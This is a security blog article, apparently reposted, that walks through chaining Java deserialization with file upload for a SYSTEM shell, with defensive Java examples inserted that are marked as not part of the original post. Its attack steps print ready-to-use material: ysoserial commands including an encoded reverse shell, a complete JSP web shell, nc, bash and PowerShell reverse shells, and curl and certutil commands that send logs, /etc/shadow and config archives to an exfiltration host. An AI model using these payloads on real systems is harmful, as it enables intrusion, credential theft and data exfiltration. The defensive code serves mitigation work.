The Perfect Storm: Chaining Insecure Deserialization with Arbitrary File Upload for SYSTEM Shell


Introduction:

In the complex landscape of web application security, vulnerabilities rarely exist in isolation. The true danger emerges when attackers chain multiple, seemingly lower-severity flaws to create a devastating attack path. This article deconstructs a critical P2 finding where an attacker combined Insecure Deserialization and Arbitrary File Upload to achieve unauthenticated Remote Code Execution (RCE) and full SYSTEM-level compromise on a Java-based service.

Learning Objectives:

  • Understand the mechanics of Java object deserialization attacks and how to exploit them.
  • Learn how to weaponize an arbitrary file upload vulnerability beyond simple defacement.
  • Master the commands and techniques to detect, exploit, and mitigate this potent vulnerability chain.

You Should Know:

1. Identifying Java Deserialization Endpoints

The first step is locating endpoints that accept serialized Java objects. These often have distinctive characteristics in HTTP requests.

 Example HTTP Request with Serialized Data (Often Base64 Encoded)
POST /api/v1/process HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/x-java-serialized-object

rO0ABXQAVklF... (abbreviated Base64 serialized object data)

Step-by-step guide: Intercept application traffic using a proxy like Burp Suite. Look for POST requests containing lengthy, base64-like strings in the body or in specific cookies (e.g., JSESSIONID). The Content-Type headers might also be a clue, but often they are misconfigured. Tools like `ysoserial` can then generate payloads to test these endpoints.
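On the defensive side, the same fingerprint the guide describes (the `rO0AB` Base64 prefix, or the raw `0xACED0005` stream header behind it) is what a request filter or log-review script should key on. The following is an added example and not code from the original post: a small Java class that classifies a request body or cookie value as a declared, undeclared, or absent serialization stream. The sample inputs in `main` are constructed, and the label strings are arbitrary.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

/**
 * Added example (not part of the original post): flags request bodies or
 * cookie values that carry a Java serialization stream, raw or Base64-encoded.
 * Meant for a request-logging filter or an offline review of access logs.
 */
public final class SerializedObjectDetector {

    // Every Java serialization stream starts with STREAM_MAGIC 0xACED followed by
    // STREAM_VERSION 0x0005. Base64 of that header always begins with "rO0AB".
    private static final byte[] STREAM_HEADER = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};
    private static final String BASE64_PREFIX = "rO0AB";

    /** True when the raw bytes begin with the serialization header. */
    public static boolean isRawSerializedStream(byte[] body) {
        if (body == null || body.length < STREAM_HEADER.length) {
            return false;
        }
        for (int i = 0; i < STREAM_HEADER.length; i++) {
            if (body[i] != STREAM_HEADER[i]) {
                return false;
            }
        }
        return true;
    }

    /**
     * True when a text value (body, cookie, parameter) is Base64 whose decoded
     * bytes begin with the header. URL-safe alphabet and surrounding whitespace
     * are tolerated because clients and proxies differ.
     */
    public static boolean isBase64SerializedStream(String value) {
        if (value == null) {
            return false;
        }
        String s = value.trim().replace('-', '+').replace('_', '/');
        if (s.length() < 8 || !s.startsWith(BASE64_PREFIX)) {
            return false; // cheap prefix check before decoding anything
        }
        try {
            // 8 Base64 characters decode to 6 bytes, enough to cover the 4-byte header.
            return isRawSerializedStream(Base64.getDecoder().decode(s.substring(0, 8)));
        } catch (IllegalArgumentException e) {
            return false; // not valid Base64
        }
    }

    /** Classifies one request for a log line or alert. */
    public static String classify(String contentType, byte[] body) {
        if (body == null) {
            return "NOT_SERIALIZED";
        }
        boolean declared = contentType != null
                && contentType.toLowerCase().contains("x-java-serialized-object");
        boolean raw = isRawSerializedStream(body);
        boolean b64 = isBase64SerializedStream(new String(body, StandardCharsets.ISO_8859_1));
        if (raw || b64) {
            // Undeclared serialized input (e.g. inside a cookie or a JSON-typed body)
            // is the case most worth alerting on.
            return declared ? "SERIALIZED_DECLARED" : "SERIALIZED_UNDECLARED";
        }
        return "NOT_SERIALIZED";
    }

    public static void main(String[] args) {
        // Constructed sample inputs, not captured traffic.
        byte[] raw = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05, 0x74, 0x00, 0x02, 'h', 'i'};
        byte[] b64 = Base64.getEncoder().encodeToString(raw).getBytes(StandardCharsets.US_ASCII);
        byte[] json = "{\"id\":1}".getBytes(StandardCharsets.UTF_8);

        System.out.println(classify("application/x-java-serialized-object", raw));
        System.out.println(classify("application/json", b64));
        System.out.println(classify("application/json", json));
    }
}
```

Run the same check over cookie values and form parameters, not only bodies, since the guide notes the Content-Type header is often missing or wrong; a stream arriving under `application/json` or inside a session cookie is the finding worth an alert.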

2. Crafting the Deserialization Payload with ysoserial

Once a vulnerable endpoint is found, you use a tool like `ysoserial` to generate a malicious serialized object that executes OS commands.

# Generating a payload that runs calc.exe (Proof-of-Concept)
java -jar ysoserial.jar CommonsCollections4 'calc.exe' > payload.ser

# For a reverse shell, the command must be encoded appropriately
java -jar ysoserial.jar CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84MCAwPiYx}|{base64,-d}|{bash,-i}' > shell.ser

Step-by-step guide: Ysoserial uses “gadget chains” (e.g., CommonsCollections4) from libraries within the target application. You must identify the correct chain for the target’s classpath. The output is a binary file (payload.ser) which you then base64-encode and submit in the vulnerable HTTP parameter.
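Because a gadget chain only works if the JVM will instantiate the chain's classes, the mitigation that directly breaks this step is a deserialization filter (JEP 290, Java 9 and later) that allow-lists the one type the endpoint expects and rejects everything else. The following is an added example, not code from the original post or from ysoserial: it serializes a hypothetical `OrderRequest` DTO, deserializes it through an `ObjectInputFilter`, and shows that any other class (here a stand-in called `Unexpected`) is refused before its constructor or `readObject` can run. The class names and limits are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

/**
 * Added example (not part of the original post): restricting what an
 * ObjectInputStream may instantiate with a JEP 290 ObjectInputFilter (Java 9+).
 * OrderRequest and Unexpected are hypothetical stand-ins for the application's
 * own DTO and for any class a gadget chain would need.
 */
public final class SafeDeserialization {

    /** The only type this endpoint is expected to receive (hypothetical). */
    public static final class OrderRequest implements Serializable {
        private static final long serialVersionUID = 1L;
        public final String sku;
        public final int quantity;
        public OrderRequest(String sku, int quantity) { this.sku = sku; this.quantity = quantity; }
    }

    /** Any other Serializable type; stands in for a gadget class. */
    public static final class Unexpected implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    // Allow-list the DTO (and String for its field), cap graph depth and array
    // sizes, and reject everything else with "!*". The same pattern string can be
    // applied JVM-wide through -Djdk.serialFilter=... for code you cannot change.
    private static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=5;maxarray=1000;java.lang.String;" + OrderRequest.class.getName() + ";!*");

    public static byte[] serialize(Serializable obj) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(obj);
        }
        return bos.toByteArray();
    }

    /** Deserializes with the filter installed; rejected classes raise InvalidClassException. */
    public static Object deserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Object ok = deserialize(serialize(new OrderRequest("SKU-1", 2)));
        System.out.println("accepted: " + ok.getClass().getSimpleName());

        try {
            deserialize(serialize(new Unexpected()));
            System.out.println("BUG: filter did not reject");
        } catch (InvalidClassException e) {
            // Expected: the filter reports status REJECTED for Unexpected
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The filter runs when the class descriptor is read, so the rejection happens before any object from the stream is constructed; that is what defeats a gadget chain regardless of which library it targets. Removing the vulnerable library version from the classpath remains worthwhile, but an allow-list does not depend on knowing every chain in advance.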

3. Weaponizing Arbitrary File Upload

An arbitrary file upload flaw allows the attacker to place a malicious JSP web shell on the server, but they need to know the upload path. The deserialization payload can be used to reveal this.

# Linux command to find web root directories, injected via deserialization
find / -name "*.jsp" -type f 2>/dev/null | head -n 5

REM Windows command alternative
dir /s C:\*.jsp | findstr /i "webapps wwwroot"

Step-by-step guide: Exploit the deserialization vulnerability to execute a system command that discovers the absolute path where uploaded files are stored. This turns the file upload from a blind vulnerability into a known location for deploying a web shell.

4. Deploying a Web Shell via Upload

With the upload path known, use the file upload functionality to deploy a JSP web shell.

Example JSP Web Shell (cmd.jsp)
<%@ page import="java.util.*,java.io.*"%>
<%
    if (request.getParameter("cmd") != null) {
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>

Step-by-step guide: This code is saved as a `.jsp` file and uploaded through the vulnerable functionality. Once uploaded, you can access it at `http://vulnerable-app.com/uploads/cmd.jsp?cmd=whoami` to execute commands directly.

5. Establishing a Reverse Shell

A simple web shell is limited. Use it to execute a more powerful reverse shell payload for interactive access.

# Using the web shell to fetch and execute a netcat reverse shell
cmd=/usr/bin/nc -e /bin/bash 192.168.1.2 4444

# For a more robust Linux reverse shell
cmd=bash -c 'bash -i >& /dev/tcp/192.168.1.2/4444 0>&1'

# Windows reverse shell using PowerShell
cmd=powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Step-by-step guide: Before executing these commands, start a netcat listener on your attack machine: `nc -nlvp 4444`. Then, trigger the reverse shell by passing the appropriate command to your deployed web shell via the `cmd` parameter.

6. Privilege Escalation to SYSTEM/NT AUTHORITY

The initial shell often runs under a limited service account. The final step is escalating privileges to gain full control over the host.

REM On Windows, check for common privilege escalation vectors
whoami /priv
systeminfo
accesschk.exe /accepteula -u -s

# On Linux, check sudo permissions and SUID binaries
sudo -l
find / -perm -4000 -type f 2>/dev/null

Step-by-step guide: These commands help identify misconfigurations. For example, a service running as SYSTEM might have weak folder permissions, allowing you to replace its DLLs. Or a `sudo` rule might allow the service account to run a specific command as root without a password.

7. Exfiltration and Debug Log Harvesting

With SYSTEM-level access, you can now exfiltrate sensitive data, including application debug logs that may contain secrets for other systems.

REM On Windows, using built-in certutil to exfiltrate a file
certutil -encode loot.zip encoded.txt & findstr /V "CERTIFICATE" encoded.txt > stager.txt & powershell Invoke-WebRequest -Uri http://exfil-server.com/collect -Method Post -InFile stager.txt

# On Linux, using curl to exfiltrate data
curl -X POST --data-binary @/var/app/logs/debug.log http://exfil-server.com/collect
tar -czf loot.tar.gz /etc/passwd /etc/shadow /app/config && curl -X POST --data-binary @loot.tar.gz http://exfil-server.com

Step-by-step guide: These commands package and exfiltrate data to a server controlled by the attacker. The Windows example uses `certutil` to base64 encode a file before sending it to avoid binary data corruption in a POST request.

What Undercode Say:

  • The Sum is Greater Than The Parts: Alone, a blind file upload or a deserialization bug might be rated lower. Chained together, they form a critical, system-compromising threat. Penetration tests must actively search for these chains.
  • Context is King for Payloads: The success of `ysoserial` is entirely dependent on the libraries (gadget chains) present on the target server. Reconnaissance and careful testing are required; a payload that works on one endpoint may not work on another.

This vulnerability chain is a classic example of a “deathstar” attack path. The mitigation is twofold: first, implement robust input validation that rejects any serialized objects from untrusted sources; use safe serialization formats like JSON instead. Second, enforce strict controls on file uploads, including validating file type by content (not just extension), storing them outside the web root, or serving them via a separate domain with no script execution privileges.
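The second half of that mitigation (validate by content, ignore the client's filename, store outside the web root) is concrete enough to show in code. The following is an added example and not code from the original post: a Java upload store that accepts only content whose leading bytes match an allow-listed file signature, assigns its own random name and extension, and refuses to write anywhere but its configured directory. The allowed types, the size cap, the directory, and the sample inputs in `main` are all assumptions.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardOpenOption;
import java.util.Arrays;
import java.util.Map;
import java.util.UUID;

/**
 * Added example (not part of the original post): upload handling that
 * validates by content, ignores the client-supplied name entirely, and
 * writes outside the web root. Allow-list, size cap and paths are assumptions.
 */
public final class SafeUploadStore {

    /** Allowed types, keyed by the extension the server (not the client) assigns. */
    private static final Map<String, byte[]> MAGIC = Map.of(
            "png", new byte[]{(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A},
            "pdf", new byte[]{'%', 'P', 'D', 'F', '-'});

    private static final long MAX_BYTES = 5L * 1024 * 1024; // assumed cap

    private final Path storageRoot; // e.g. /var/app/uploads, never under the servlet web root

    public SafeUploadStore(Path storageRoot) {
        this.storageRoot = storageRoot.toAbsolutePath().normalize();
    }

    /** Returns the extension matching the content's signature, or null if none matches. */
    public static String detectType(byte[] content) {
        for (Map.Entry<String, byte[]> e : MAGIC.entrySet()) {
            byte[] sig = e.getValue();
            if (content.length >= sig.length
                    && Arrays.equals(Arrays.copyOf(content, sig.length), sig)) {
                return e.getKey();
            }
        }
        return null;
    }

    /**
     * Stores the content under a random name whose extension comes from the
     * content signature, never from the request. Returns an opaque id that a
     * download controller can map back to the file.
     */
    public String store(byte[] content) throws IOException {
        if (content == null || content.length == 0 || content.length > MAX_BYTES) {
            throw new IllegalArgumentException("size out of range");
        }
        String type = detectType(content);
        if (type == null) {
            throw new IllegalArgumentException("content does not match an allowed type");
        }
        String id = UUID.randomUUID().toString();
        Path target = storageRoot.resolve(id + "." + type).normalize();
        if (!target.startsWith(storageRoot)) {
            throw new IllegalStateException("path escaped storage root"); // defensive check
        }
        Files.createDirectories(storageRoot);
        Files.write(target, content, StandardOpenOption.CREATE_NEW); // never overwrite
        return id;
    }

    public static void main(String[] args) throws IOException {
        // Constructed inputs: a minimal PNG header and a JSP-looking text blob.
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A, 0, 0, 0, 13};
        byte[] jsp = "<% out.println(\"hello\"); %>".getBytes(StandardCharsets.UTF_8);

        SafeUploadStore store = new SafeUploadStore(Files.createTempDirectory("uploads"));
        System.out.println("stored png as id " + store.store(png));
        try {
            store.store(jsp); // the original filename "cmd.jsp" is irrelevant: content decides
            System.out.println("BUG: script content was accepted");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Serve stored files through a controller that looks up the id, sets a fixed `Content-Type` for the detected type and a `Content-Disposition: attachment` header, rather than mapping the directory as static content; with the files outside the web root the container has no path at which it would ever compile a `.jsp`, which removes the final link of the chain even if an upload check is bypassed.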

Prediction:

The sophistication of vulnerability chaining will only increase with the adoption of AI-powered penetration testing tools. These systems will be able to automatically map application attack surfaces, identify discrete vulnerabilities, and proactively chain them together to demonstrate real-world impact with minimal human intervention. This will force a shift in bug bounty programs and risk assessments from scoring individual CVEs to rating the overall attack resilience of an application’s architecture, making defense-in-depth not just a best practice but an absolute necessity.

Reported By: Hs Ninja – Hackers Feeds